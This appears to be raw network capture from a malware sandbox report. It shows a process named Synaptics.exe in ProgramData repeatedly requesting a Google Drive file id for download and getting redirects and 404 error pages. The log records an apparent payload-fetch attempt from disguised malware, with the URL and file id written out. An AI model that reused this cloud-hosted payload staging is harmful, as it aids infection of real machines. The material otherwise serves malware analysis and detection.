                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-HPEcqOlELmPtAjlw95QXsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                26192.168.2.749772216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:17 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:17 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:17 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-iyed252OZri3qOevhl3dIQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                27192.168.2.749785216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:18 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:18 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:18 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ls8K-R9-rxM3vICCP4_RPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                28192.168.2.749786216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:18 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:18 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:18 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-8DOjmYVhuFn28vsH5lqgJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                29192.168.2.749787142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:18 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:18 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC74tOTfK3xh63szB0FWh97khp52veaamqBE0N4LV0JFJJivhcSA3O42nM1R4Z3EHPvm0McxCUs
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:18 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-B_-sPSOJbDgfwMC_Xg7Ykg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:18 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:18 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 56 77 45 35 5a 6b 7a 75 33 44 77 42 78 44 6a 38 66 33 6c 66 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="IVwE5Zkzu3DwBxDj8f3lfw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:18 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                30192.168.2.749790142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:18 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:18 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5Ul7kuMC_3LQEKEYdaFNC8_j61Um0ubERqr313NXVfL5grqy6G-eWArcBr_zElQi5S
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:18 GMT
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-jQzkyXDDxxo1_sDqOABQdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:18 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:18 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 6e 53 77 34 39 7a 45 4d 73 31 47 7a 41 6d 79 33 4b 4c 70 54 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                Data Ascii: t Found)!!1</title><style nonce="knSw49zEMs1GzAmy3KLpTw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:18 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                31192.168.2.749799216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:19 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:19 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:19 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-6IZqHYg4RDWh64vjGbCLCA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                32192.168.2.749800216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:19 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-12-30 09:58:19 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:19 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-EofcD4wpXyykzB9zjHvfwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                33192.168.2.749801142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:19 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:19 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6s_dRA2fLEE3QSoe1pongHReCpGlnZnEdP9A89uQ9xOza9id05mzBFWhzUHs8qZXFr
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:19 GMT
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Y6PVv7T7qoZVk8Qvg8JQ-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:19 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:19 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 50 67 56 59 6c 2d 76 49 7a 69 37 78 6f 6f 64 33 5f 31 69 6e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                Data Ascii: t Found)!!1</title><style nonce="-PgVYl-vIzi7xood3_1inQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
